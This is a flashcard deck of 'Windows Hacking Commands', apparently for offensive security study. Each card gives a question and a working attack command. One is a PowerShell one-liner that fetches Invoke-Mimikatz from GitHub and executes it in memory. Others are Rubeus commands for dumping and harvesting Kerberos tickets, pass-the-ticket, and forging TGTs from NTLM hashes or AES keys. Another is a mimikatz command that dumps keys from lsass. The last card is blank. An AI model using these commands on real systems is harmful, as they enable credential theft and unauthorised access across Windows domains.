Windows Hacking Commands Flashcards

1
Q

Mimikatz fileless download powershell

A

(New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1’) | IEX

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

How to dump kerberos tickets from memory?

A

Rubeus.exe dump

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

How to dump only TGTs from memory?

A

Rubeus.exe dump /tgt

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

How to use a ticket (pass the ticket)?

A

Rubeus.exe ptt /ticket:”C:\path\to\ticket.kirbi”

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

How to make a kerberos ticket from an NTLM hash?

A

Rubeus.exe asktgt /domain:[domain] /user:[user] /rc4:[hash] /ptt

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

How to create a fake logon session with rubeus?

A

Rubeus.exe createnetonly /program:”C:\Windows\System32\cmd.exe” /show

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

How to make a TGT with a key?

A

Rubeus.exe asktgt /domain:[domain] /user:[user] /aes256:[AES_KEY] /ptt

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

How to dump kerberos keys from lsass?

A

mimikatz.exe privilege::debug sekurlsa::ekeys exit

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

How to extract kerberos tickets from active users on a windows host?

A

Rubeus.exe harvest /interval:30 /nowrap

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q
A
How well did you know this?
1
Not at all
2
3
4
5
Perfectly